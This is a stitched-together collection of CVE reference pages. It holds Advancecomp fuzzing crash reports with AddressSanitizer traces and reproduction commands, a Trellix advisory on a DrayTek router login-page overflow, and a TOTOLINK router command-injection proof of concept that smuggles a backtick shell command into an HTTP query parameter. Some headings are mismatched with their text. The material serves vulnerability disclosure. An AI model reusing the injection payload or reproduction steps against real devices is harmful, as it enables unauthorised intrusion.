2022-01-28: commit 4e0f718daf97 accepted to mainline kernel
2022-02-09: commit 7ec02f5ac8a5 accepted to mainline kernel
2022-03-09: commit 71171ac8eb34 accepted to mainline kernel
2022-04-01: CVE-2022-1199 is assigned

=\*=\*=\*=\*=\*=\*=\*=\*=  Credit  =\*=\*=\*=\*=\*=\*=\*=\*=

Duoming Zhou <duoming@....edu.cn>

Best Regards,
Duoming Zhou

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.

CVE-2022-1199: security - CVE-2022-1199 kernel: Null pointer dereference and use-after-free in ax25_release()

An out-of-bounds read vulnerability was discovered in linux kernel in the smc protocol stack, causing remote dos.

'2040604?cve=title' is not a valid bug number nor an alias to a bug.

Please press **Back** and try again.

CVE-2022-0400: Invalid Bug ID

Advancecomp v2.3 contains a segmentation fault.

    AddressSanitizer:DEADLYSIGNAL
    
    ==4310==ERROR: AddressSanitizer: SEGV on unknown address (pc 0x0000004298a4 bp 0x000000000001 sp 0x7fffdc8dd140 T0)
    ==4310==The signal is caused by a READ memory access.
    ==4310==Hint: this fault was caused by a dereference of a high value address (see register values below).  Disassemble the provided pc to learn which register was used.
        #0 0x4298a4 in bool __sanitizer::atomic_compare_exchange_strong<__sanitizer::atomic_uint8_t>(__sanitizer::atomic_uint8_t volatile*, __sanitizer::atomic_uint8_t::Type*, __sanitizer::atomic_uint8_t::Type, __sanitizer::memory_order) /home/bupt/Desktop/tools/llvm-12.0.1/llvm/projects/compiler-rt/lib/asan/../sanitizer_common/sanitizer_atomic_clang.h:80
        #1 0x4298a4 in __asan::Allocator::AtomicallySetQuarantineFlagIfAllocated(__asan::AsanChunk*, void*, __sanitizer::BufferedStackTrace*) /home/bupt/Desktop/tools/llvm-12.0.1/llvm/projects/compiler-rt/lib/asan/asan_allocator.cpp:621
        #2 0x4298a4 in __asan::Allocator::Deallocate(void*, unsigned long, unsigned long, __sanitizer::BufferedStackTrace*, __asan::AllocType) /home/bupt/Desktop/tools/llvm-12.0.1/llvm/projects/compiler-rt/lib/asan/asan_allocator.cpp:697
        #3 0x4298a4 in __asan::asan_free(void*, __sanitizer::BufferedStackTrace*, __asan::AllocType) /home/bupt/Desktop/tools/llvm-12.0.1/llvm/projects/compiler-rt/lib/asan/asan_allocator.cpp:971
        #4 0x4b1550 in free /home/bupt/Desktop/tools/llvm-12.0.1/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cpp:128
        #5 0x52382d in mng_write_done(adv_mng_write_struct*) /home/bupt/Desktop/advancecomp/mngex.cc:709:2
        #6 0x5088ea in convert_f_mng(adv_fz_struct*, adv_fz_struct*, unsigned int*, unsigned int*, adv_scroll_info_struct*, bool, bool) /home/bupt/Desktop/advancecomp/remng.cc:524:3
        #7 0x4fbd7d in convert_mng(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&) /home/bupt/Desktop/advancecomp/remng.cc:593:3
        #8 0x4fc3dd in convert_mng_inplace(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&) /home/bupt/Desktop/advancecomp/remng.cc:614:3
        #9 0x4ffc08 in remng_single(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, unsigned long long&, unsigned long long&) /home/bupt/Desktop/advancecomp/remng.cc:950:4
        #10 0x50b705 in remng_all(int, char**) /home/bupt/Desktop/advancecomp/remng.cc:985:3
        #11 0x5102d4 in process(int, char**) /home/bupt/Desktop/advancecomp/remng.cc:1249:3
        #12 0x511a98 in main /home/bupt/Desktop/advancecomp/remng.cc:1268:3
        #13 0x7fcbd84a9c86 in __libc_start_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310
        #14 0x41f289 in _start (/home/bupt/Desktop/advancecomp/advmng+0x41f289)
    
    AddressSanitizer can not provide additional info.
    SUMMARY: AddressSanitizer: SEGV /home/bupt/Desktop/tools/llvm-12.0.1/llvm/projects/compiler-rt/lib/asan/../sanitizer_common/sanitizer_atomic_clang.h:80 in bool __sanitizer::atomic_compare_exchange_strong<__sanitizer::atomic_uint8_t>(__sanitizer::atomic_uint8_t volatile*, __sanitizer::atomic_uint8_t::Type*, __sanitizer::atomic_uint8_t::Type, __sanitizer::memory_order)
    ==4310==ABORTING
    

    SUMMARY: AddressSanitizer: SEGV /home/bupt/Desktop/tools/llvm-12.0.1/llvm/projects/compiler-rt/lib/asan/../sanitizer_common/sanitizer_atomic_clang.h:80 in bool __sanitizer::atomic_compare_exchange_strong<__sanitizer::atomic_uint8_t>(__sanitizer::atomic_uint8_t volatile*, __sanitizer::atomic_uint8_t::Type*, __sanitizer::atomic_uint8_t::Type, __sanitizer::memory_order)

CVE-2022-35014: Poc/CVE-2022-35014.md at main · Cvjark/Poc

Advancecomp v2.3 was discovered to contain a heap buffer overflow via le_uint32_read at /lib/endianrw.h.

Permalink

**Product link**

https://github.com/amadvance/advancecomp

**POC file**

https://github.com/Cvjark/Poc/files/9060007/id0\_command\_advzip\_-x\_heap-buffer-overflow\_sample\_No.zip

**Command to reproduce**

./advzip -x [POC file]

**Product name & version**

last github commit code : a543d4c

**Problem Type**

heap buffer overflow

**Crash summary**

    SUMMARY: AddressSanitizer: heap-buffer-overflow /home/bupt/Desktop/advancecomp/./lib/endianrw.h:172:90 in le_uint32_read(void const*)
    

**Crash Detail**

    ==96173==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x612000000149 at pc 0x00000051f317 bp 0x7fffeeb84d10 sp 0x7fffeeb84d08
    READ of size 1 at 0x612000000149 thread T0
        #0 0x51f316 in le_uint32_read(void const*) /home/bupt/Desktop/advancecomp/./lib/endianrw.h:172:90
        #1 0x51f316 in zip::open() /home/bupt/Desktop/advancecomp/zip.cc:860:10
        #2 0x504089 in extract_all(int, char**, bool) /home/bupt/Desktop/advancecomp/rezip.cc:301:4
        #3 0x508c3d in process(int, char**) /home/bupt/Desktop/advancecomp/rezip.cc:604:3
        #4 0x509b88 in main /home/bupt/Desktop/advancecomp/rezip.cc:623:3
        #5 0x7f194282ec86 in __libc_start_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310
        #6 0x41f1e9 in _start (/home/bupt/Desktop/advancecomp/advzip+0x41f1e9)
    
    0x612000000149 is located 0 bytes to the right of 265-byte region [0x612000000040,0x612000000149)
    allocated by thread T0 here:
        #0 0x4b17b0 in malloc /home/bupt/Desktop/tools/llvm-12.0.1/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cpp:145
        #1 0x52ada4 in data_alloc(unsigned int) /home/bupt/Desktop/advancecomp/data.cc:51:40
    
    SUMMARY: AddressSanitizer: heap-buffer-overflow /home/bupt/Desktop/advancecomp/./lib/endianrw.h:172:90 in le_uint32_read(void const*)
    Shadow bytes around the buggy address:
      0x0c247fff7fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c247fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c247fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c247fff8000: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
      0x0c247fff8010: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    =>0x0c247fff8020: 00 00 00 00 00 00 00 00 00[01]fa fa fa fa fa fa
      0x0c247fff8030: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c247fff8040: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c247fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c247fff8060: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c247fff8070: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07 
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
      Shadow gap:              cc
    ==96173==ABORTING

CVE-2022-35015: Poc/CVE-2022-35015.md at main · Cvjark/Poc

Advancecomp v2.3 was discovered to contain a segmentation fault.

    AddressSanitizer:DEADLYSIGNAL
    =================================================================
    ==95612==ERROR: AddressSanitizer: SEGV on unknown address 0x616000010000 (pc 0x7f8d29a1faf8 bp 0x61900000042a sp 0x7ffc45b8ea68 T0)
    ==95612==The signal is caused by a WRITE memory access.
        #0 0x7f8d29a1faf8  (/lib/x86_64-linux-gnu/libz.so.1+0x9af8)
        #1 0x7f8d29a21419 in inflate (/lib/x86_64-linux-gnu/libz.so.1+0xb419)
        #2 0x7f8d29a274b3 in uncompress2 (/lib/x86_64-linux-gnu/libz.so.1+0x114b3)
        #3 0x7f8d29a275a2 in uncompress (/lib/x86_64-linux-gnu/libz.so.1+0x115a2)
        #4 0x544085 in mng_read_delta /home/bupt/Desktop/advancecomp/lib/mng.c:542:7
        #5 0x544085 in mng_read /home/bupt/Desktop/advancecomp/lib/mng.c:656:9
        #6 0x5418da in adv_mng_read /home/bupt/Desktop/advancecomp/lib/mng.c:748:9
        #7 0x5074e6 in convert_f_mng(adv_fz_struct*, adv_fz_struct*, unsigned int*, unsigned int*, adv_scroll_info_struct*, bool, bool) /home/bupt/Desktop/advancecomp/remng.cc:479:8
        #8 0x4fbd7d in convert_mng(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&) /home/bupt/Desktop/advancecomp/remng.cc:593:3
        #9 0x4fc3dd in convert_mng_inplace(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&) /home/bupt/Desktop/advancecomp/remng.cc:614:3
        #10 0x4ffc08 in remng_single(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, unsigned long long&, unsigned long long&) /home/bupt/Desktop/advancecomp/remng.cc:950:4
        #11 0x50b705 in remng_all(int, char**) /home/bupt/Desktop/advancecomp/remng.cc:985:3
        #12 0x5102d4 in process(int, char**) /home/bupt/Desktop/advancecomp/remng.cc:1249:3
        #13 0x511a98 in main /home/bupt/Desktop/advancecomp/remng.cc:1268:3
        #14 0x7f8d286dcc86 in __libc_start_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310
        #15 0x41f289 in _start (/home/bupt/Desktop/advancecomp/advmng+0x41f289)
    
    AddressSanitizer can not provide additional info.
    SUMMARY: AddressSanitizer: SEGV (/lib/x86_64-linux-gnu/libz.so.1+0x9af8) 
    ==95612==ABORTING
    

    SUMMARY: AddressSanitizer: SEGV (/lib/x86_64-linux-gnu/libz.so.1+0x9af8)

CVE-2022-35019: Poc/CVE-2022-35019.md at main · Cvjark/Poc

Advancecomp v2.3 was discovered to contain a heap buffer overflow.

    =================================================================
    ==95486==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6020000000f1 at pc 0x000000549906 bp 0x7ffc1e70ea10 sp 0x7ffc1e70ea08
    READ of size 16 at 0x6020000000f1 thread T0
        #0 0x549905 in mng_delta_addition /home/bupt/Desktop/advancecomp/lib/mng.c:406:13
        #1 0x5446c7 in mng_read_delta /home/bupt/Desktop/advancecomp/lib/mng.c:550:4
        #2 0x5446c7 in mng_read /home/bupt/Desktop/advancecomp/lib/mng.c:656:9
        #3 0x5418da in adv_mng_read /home/bupt/Desktop/advancecomp/lib/mng.c:748:9
        #4 0x5074e6 in convert_f_mng(adv_fz_struct*, adv_fz_struct*, unsigned int*, unsigned int*, adv_scroll_info_struct*, bool, bool) /home/bupt/Desktop/advancecomp/remng.cc:479:8
        #5 0x4fbd7d in convert_mng(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&) /home/bupt/Desktop/advancecomp/remng.cc:593:3
        #6 0x4fc3dd in convert_mng_inplace(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&) /home/bupt/Desktop/advancecomp/remng.cc:614:3
        #7 0x4ffc08 in remng_single(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, unsigned long long&, unsigned long long&) /home/bupt/Desktop/advancecomp/remng.cc:950:4
        #8 0x50b705 in remng_all(int, char**) /home/bupt/Desktop/advancecomp/remng.cc:985:3
        #9 0x5102d4 in process(int, char**) /home/bupt/Desktop/advancecomp/remng.cc:1249:3
        #10 0x511a98 in main /home/bupt/Desktop/advancecomp/remng.cc:1268:3
        #11 0x7f3b95b0ac86 in __libc_start_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310
        #12 0x41f289 in _start (/home/bupt/Desktop/advancecomp/advmng+0x41f289)
    
    0x6020000000f1 is located 0 bytes to the right of 1-byte region [0x6020000000f0,0x6020000000f1)
    allocated by thread T0 here:
        #0 0x4b1850 in malloc /home/bupt/Desktop/tools/llvm-12.0.1/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cpp:145
        #1 0x54332a in mng_read_delta /home/bupt/Desktop/advancecomp/lib/mng.c:455:18
        #2 0x54332a in mng_read /home/bupt/Desktop/advancecomp/lib/mng.c:656:9
        #3 0x5418da in adv_mng_read /home/bupt/Desktop/advancecomp/lib/mng.c:748:9
        #4 0x4fbd7d in convert_mng(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&) /home/bupt/Desktop/advancecomp/remng.cc:593:3
        #5 0x4fc3dd in convert_mng_inplace(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&) /home/bupt/Desktop/advancecomp/remng.cc:614:3
        #6 0x4ffc08 in remng_single(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, unsigned long long&, unsigned long long&) /home/bupt/Desktop/advancecomp/remng.cc:950:4
        #7 0x50b705 in remng_all(int, char**) /home/bupt/Desktop/advancecomp/remng.cc:985:3
        #8 0x5102d4 in process(int, char**) /home/bupt/Desktop/advancecomp/remng.cc:1249:3
        #9 0x511a98 in main /home/bupt/Desktop/advancecomp/remng.cc:1268:3
        #10 0x7f3b95b0ac86 in __libc_start_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310
    
    SUMMARY: AddressSanitizer: heap-buffer-overflow /home/bupt/Desktop/advancecomp/lib/mng.c:406:13 in mng_delta_addition
    Shadow bytes around the buggy address:
      0x0c047fff7fc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c047fff7fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c047fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c047fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c047fff8000: fa fa fd fd fa fa fd fd fa fa fd fd fa fa 01 fa
    =>0x0c047fff8010: fa fa fd fa fa fa fd fa fa fa fd fd fa fa[01]fa
      0x0c047fff8020: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c047fff8030: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c047fff8040: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c047fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c047fff8060: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07 
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
      Shadow gap:              cc
    ==95486==ABORTING
    

    SUMMARY: AddressSanitizer: heap-buffer-overflow /home/bupt/Desktop/advancecomp/lib/mng.c:406:13 in mng_delta_addition

CVE-2022-35017: Poc/CVE-2022-35017.md at main · Cvjark/Poc

Permalink

Cannot retrieve contributors at this time

**Product link**

https://github.com/amadvance/advancecomp

**POC file**

https://github.com/Cvjark/Poc/files/9060011/id1\_command\_advzip\_-x\_heap-buffer-overflow\_sample\_No.zip

**Command to reproduce**

./advzip -x [sample file]

**Product name & version**

last github commit code : a543d4c

**Problem Type**

Heap buffer overflow

**Crash Detail**

    ==96177==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61200000015c at pc 0x0000004b07b2 bp 0x7ffff13f3a60 sp 0x7ffff13f3210
    READ of size 256 at 0x61200000015c thread T0
        #0 0x4b07b1 in __asan_memcpy /home/bupt/Desktop/tools/llvm-12.0.1/llvm/projects/compiler-rt/lib/asan/asan_interceptors_memintrinsics.cpp:22
        #1 0x52acdb in data_dup(unsigned char const*, unsigned int) /home/bupt/Desktop/advancecomp/data.cc:39:4
        #2 0x51e5d9 in zip::open() /home/bupt/Desktop/advancecomp/zip.cc:888:21
        #3 0x504089 in extract_all(int, char**, bool) /home/bupt/Desktop/advancecomp/rezip.cc:301:4
        #4 0x508c3d in process(int, char**) /home/bupt/Desktop/advancecomp/rezip.cc:604:3
        #5 0x509b88 in main /home/bupt/Desktop/advancecomp/rezip.cc:623:3
        #6 0x7f7831f27c86 in __libc_start_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310
        #7 0x41f1e9 in _start (/home/bupt/Desktop/advancecomp/advzip+0x41f1e9)
    
    0x61200000015c is located 0 bytes to the right of 284-byte region [0x612000000040,0x61200000015c)
    allocated by thread T0 here:
        #0 0x4b17b0 in malloc /home/bupt/Desktop/tools/llvm-12.0.1/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cpp:145
        #1 0x52ada4 in data_alloc(unsigned int) /home/bupt/Desktop/advancecomp/data.cc:51:40
    
    SUMMARY: AddressSanitizer: heap-buffer-overflow /home/bupt/Desktop/tools/llvm-12.0.1/llvm/projects/compiler-rt/lib/asan/asan_interceptors_memintrinsics.cpp:22 in __asan_memcpy
    Shadow bytes around the buggy address:
      0x0c247fff7fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c247fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c247fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c247fff8000: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
      0x0c247fff8010: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    =>0x0c247fff8020: 00 00 00 00 00 00 00 00 00 00 00[04]fa fa fa fa
      0x0c247fff8030: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c247fff8040: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c247fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c247fff8060: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c247fff8070: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07 
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
      Shadow gap:              cc
    ==96177==ABORTING
    

**Crash summary**

    
    SUMMARY: AddressSanitizer: heap-buffer-overflow /home/bupt/Desktop/tools/llvm-12.0.1/llvm/projects/compiler-rt/lib/asan/asan_interceptors_memintrinsics.cpp:22 in __asan_memcpy

CVE-2022-35016: Poc/CVE-2022-35016.md at main · Cvjark/Poc

An issue was discovered on certain DrayTek Vigor routers before July 2022 such as the Vigor3910 before 4.3.1.1. /cgi-bin/wlogin.cgi has a buffer overflow via the username or password to the aa or ab field.

**Summary**

The Trellix Threat Labs Vulnerability Research team has found an unauthenticated remote code execution vulnerability, filed under CVE-2022-32548 affecting multiple DrayTek routers. The attack can be performed without user interaction if the management interface of the device has been configured to be internet facing. A one-click attack can also be performed from within the LAN in the default device configuration. The attack can lead to a full compromise of the device and may lead to a network breach and unauthorized access to internal resources. All the affected models have a patched firmware available for download on the vendor’s website.

**Introduction**

DrayTek is a Taiwanese company that manufactures Small Office and Home Office (SOHO) routers with a wide adoption in the UK, Vietnam, Taiwan, etc. (src: Shodan).

**Figure 1. Shodan search showing DrayTek devices used throughout the world**

With many businesses implementing work from home policies over the last two years, these affordable devices offer an easy way for Small and Medium Sized Businesses (SMBs) to provide VPN access to their employees. For this reason, we decided to look into the security of one of their flagship products, the Vigor 3910, and found a pre-authentication remote code execution vulnerability affecting the Vigor 3910 and 28 other DrayTek models sharing the same codebase (see Affected Devices below). Exploiting this vulnerability can lead to a complete compromise of the device and can enable a malicious actor to access internal resources of the breached networks.

During our research we uncovered over 200k devices which have the vulnerable service currently exposed on the internet and would require no user interaction to be exploited. Many more devices where the affected service is not exposed externally are still vulnerable to a one-click attack from the LAN. This vulnerability is tracked by MITRE as CVE-2022-32548 with a CVSS 3.0 score of 10.0. A patch has already been released by the manufacturer. If you or your organization are managing DrayTek devices, we recommend that you visit the manufacturer website and apply the patch as soon as possible.

We also applaud DrayTek for their great responsiveness and the release of a patch less than 30 days after we disclosed the vulnerability to their security team. This type of responsiveness and relationship shows true organization maturity and drive to improve security across the entire industry.

**Figure 2. A DrayTek Vigor 3910**

**Vulnerable devices**

The vulnerable devices are as follow:

Vigor3910 < 4.3.1.1  
Vigor1000B < 4.3.1.1  
Vigor2962 Series < 4.3.1.1  
Vigor2927 Series < 4.4.0  
Vigor2927 LTE Series < 4.4.0  
Vigor2915 Series < 4.3.3.2  
Vigor2952 / 2952P < 3.9.7.2  
Vigor3220 Series < 3.9.7.2  
Vigor2926 Series < 3.9.8.1  
Vigor2926 LTE Series < 3.9.8.1  
Vigor2862 Series < 3.9.8.1  
Vigor2862 LTE Series < 3.9.8.1  
Vigor2620 LTE Series < 3.9.8.1  
VigorLTE 200n < 3.9.8.1  
Vigor2133 Series < 3.9.6.4  
Vigor2762 Series < 3.9.6.4  
Vigor165 < 4.2.4  
Vigor166 < 4.2.4  
Vigor2135 Series < 4.4.2  
Vigor2765 Series < 4.4.2  
Vigor2766 Series < 4.4.2  
Vigor2832 < 3.9.6  
Vigor2865 Series < 4.4.0  
Vigor2865 LTE Series < 4.4.0  
Vigor2866 Series < 4.4.0  
Vigor2866 LTE Series < 4.4.0  

**Impact**

The compromise of a network appliance such as the Vigor 3910 can lead to the following outcomes (the following is a non-exhaustive list presented in no particular order):

*   Leak of the sensitive data stored on the router (keys, administrative passwords, etc.)
*   Access to the internal resources located on the LAN that would normally require VPN-access or be present “on the same network”
*   Man in the middle of the network traffic
*   Spying on DNS requests and other unencrypted traffic directed to the internet from the LAN through the router
*   Packet capture of the data going through any port of the router
*   Botnet activity (DDoS, hosting malicious data, etc.)
*   Leak of the sensitive data stored on the router (keys, administrative passwords, etc.)

Failed exploitation attempts can lead to:

*   Reboot of the device
*   Denial of Service of affected devices
*   Other possible abnormal behavior

Trellix Threat Labs is not currently aware of any signs of exploitation of this vulnerability in the wild; however, DrayTek devices were recently targeted by various known malicious actors. This was highlighted in the CISA’s memo on the People Republic of China (PRC) compromising SOHO routers and the report from Black Lotus Labs on the ZuoRAT exploiting the Vigor 3900 (end-of-life device replaced by the Vigor 3910). The nature of CVE-2022-32548 makes it harder to exploit compared to past vulnerabilities affecting DrayTek devices, which may hinder threat actors from quickly adopting this vulnerability into their attack frameworks.

**Demo video**

The following demo video highlights how an attacker could compromise a Draytek router and pivot to internal resources in a mock-network we’ve created.

**Technical details**

The web management interface of the vulnerable DrayTek devices is affected by a buffer overflow on the login page at **/cgi-bin/wlogin.cgi.** An attacker may supply carefully crafted username and/or password as base64 encoded strings inside the fields **aa** and **ab** of the login page. This would cause the buffer overflow to trigger due to a logic bug in the size verification of these encoded strings. By default, this attack is reachable on the LAN and may be reachable via the internet (WAN) as well if the user has enabled remote web management on their device. The consequence of this attack is a takeover of the so called “DrayOS” that implements the router functionalities. On devices that have an underlying Linux operating system (such as the Vigor 3910) it is then possible to pivot to the underlying operating system and establish a reliable foothold on the device and local network. Devices that are running the DrayOS as a bare-metal operating system will be harder to compromise as it requires that an attacker has better understanding of the DrayOS internals.

We will release more details as of how this bug was found and exploited in our upcoming talk at Hexacon on October 14-15, 2022 and the follow-up blog post that we will publish alongside the presentation.

**Detection**

Exploitation attempts can be detected by logging/alerting when a malformed base64 string is sent via a POST request to the **/cgi-bin/wlogin.cgi** end-point on the web management interface router. Base64 encoded strings are expected to be found in the **aa** and **ab** fields of the POST request. Malformed base64 strings indicative of an attack would have an abnormally high number of %3D padding. Any number over three should be considered suspicious.

The Trellix Network Security Platform has additionally released rules for exploitation attempts of this vulnerability under the identifier, _DrayTek CVE-2022-32548 Buffer Overflow Attempt._

**Recommendation**

We provide the following recommendations to those potentially affected by a vulnerable DrayTek router:

*   Make sure the latest firmware is deployed to your device. You can find the latest firmware by visiting the website of the manufacturer.
*   In the management interface of the device, verify that port mirroring, DNS settings, authorized VPN access and any other relevant settings have not been tampered with.
*   Do not expose the management interface to the Internet unless absolutely required. If you do, make sure you enable 2FA and IP restriction to minimize the risk of an attack.
*   Change the password of affected devices and revoke any secret stored on the router that may have been leaked.

**Conclusion**

Edge devices, such as the Vigor 3910 router, live on the boundary between internal and external networks. As such they are a prime target for cybercriminals and threat actors alike. Remotely breaching edge devices can lead to a full compromise of the businesses’ internal network. This is why it is critical to ensure these devices remain secure and updated and that vendors producing edge devices have processes in place for quick and efficient response following vulnerability disclosure, just as DrayTek did. Stay tuned for our next article on DrayTek routers where we will present the process used to uncover this vulnerability.

_This document and the information contained herein describes computer security research for educational purposes only and the convenience of Trellix customers. Trellix conducts research in accordance with its Vulnerability Reasonable Disclosure Policy | Trellix. Any attempt to recreate part or all of the activities described is solely at the user’s risk, and neither Trellix nor its affiliates will bear any responsibility or liability._

CVE-2022-32548: Unauthenticated Remote Code Execution in a Wide Range of DrayTek Vigor Routers

TOTOLINK A810R V5.9c.4050_B20190424 was discovered to contain a command injection vulnerability via the component downloadFile.cgi.

Permalink

Cannot retrieve contributors at this time

**command injection****A810R\_Firmware**

version: V5.9c.4050\_B20190424

**Description:**

There is a command injection in downloadFile.cgi. Still exist in V5.9c.4050\_B20190424.

**Source:**

you may download it from : http://www.totolink.cn/home/menu/detail.html?menu\_listtpl=download&id=2&ids=36

**Analyse:**

don't check the input of QUERY\_STRING and call system

**POC**

    GET /cgi-bin/downloadFlile.cgi?payload=`dw>../1.txt` HTTP/1.1 
    Host: 192.168.1.106
    User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0 
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 accept-language: zh-CN,zh;q=0.9
    Accept-Encoding: gzip, deflate 
    Connection: keep-alive 
    Upgrade-Insecure-Requests: 1 
    Cache-Control: max-age=0

Tag

#linux